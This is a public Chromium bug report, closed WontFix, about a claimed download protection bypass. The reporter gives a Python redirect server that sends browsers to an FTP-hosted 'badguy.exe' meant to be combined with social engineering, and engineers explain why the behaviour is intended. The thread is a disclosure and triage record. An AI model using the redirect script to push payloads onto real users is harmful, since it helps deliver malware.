New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 626408 link

Starred by 1 user
Status: WontFix
Owner: ----
Closed: Jul 2016
Cc:
phajdan.jr@chromium.org
asanka@chromium.org
rdsmith@chromium.org
nparker@chromium.org
vakh@chromium.org
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: Download Protection Bypass Vulnerability

Reported by akrush...@gmail.com, Jul 7 2016 
Hello,

The vulnerability below was tested using steps similar to the WGET exploit [https://www.exploit-db.com/exploits/40064/] that was published recently.

To reproduce: run a FTP server on one host to act as a stager with any payload you wish to land on a target.

Then, in Chrome (51.0.2704.103) redirect the user to a HTTP server running the following sample Python Script :

import SimpleHTTPServer
import SocketServer

class myHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
   def do_GET(self):
       self.send_response(301)
       self.send_header('Location','ftp://yourftpserverip/badguy.exe')
       self.end_headers()

theport = 80
Handler = myHandler
pywebserver = SocketServer.TCPServer(("", theport), Handler)

print "Python based web server. Serving at port", theport
pywebserver.serve_forever()


In the root of the http server place a payload you want to download. When you connect to the webserver, Chrome will automatically download the badguy.exe file. While the file will not automatically execute, combined with a social engineering focused landing page, a user could potentially execute any payload retrieved in this way.

Comment 1 by calamity@chromium.org, Jul 11 2016

Cc: asanka@chromium.org rdsmith@chromium.org phajdan.jr@chromium.org
Components: UI>Browser>Downloads Internals>Network

Comment 2 by asanka@chromium.org, Jul 11 2016

Labels: Needs-Feedback
Why do you think download protection was bypassed in this case?

In general, Chrome considers the final URL to be authoritative when generating a filename. It's done this way so that some other unrelated site can't force a different filename onto a resource that was meant to be downloaded under a specific filename. The behavior in #0 is consistent with what we expect.

Also, someone who controls the response to a navigation request can already force a download. No redirects needed. That in itself isn't considered a vulnerability. Protection against that behavior (which is commonly used for legitimate purposes) is provided by a combination of file type specific warnings and SafeBrowsing download protection.

Comment 3 Deleted

Comment 4 by asanka@chromium.org, Jul 11 2016

Cc: nparker@chromium.org
Components: -Internals>Network Services>Safebrowsing
+SafeBrowsing, -Network

I also noticed that the random (invalid) .exe file I used for testing didn't get flagged when downloaded via ftp nor http.

Comment 5 by akrush...@gmail.com, Jul 11 2016 

Thank you for your timely response. I believe your analysis matches the behavior observed in the POC, and as such it appears that mitigations are already in place.

Comment 6 by nparker@chromium.org, Jul 11 2016

Status: WontFix (was: Unconfirmed)
It appears this is WAI.
Project Member

Comment 7 by sheriffbot@chromium.org, Oct 18 2016

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment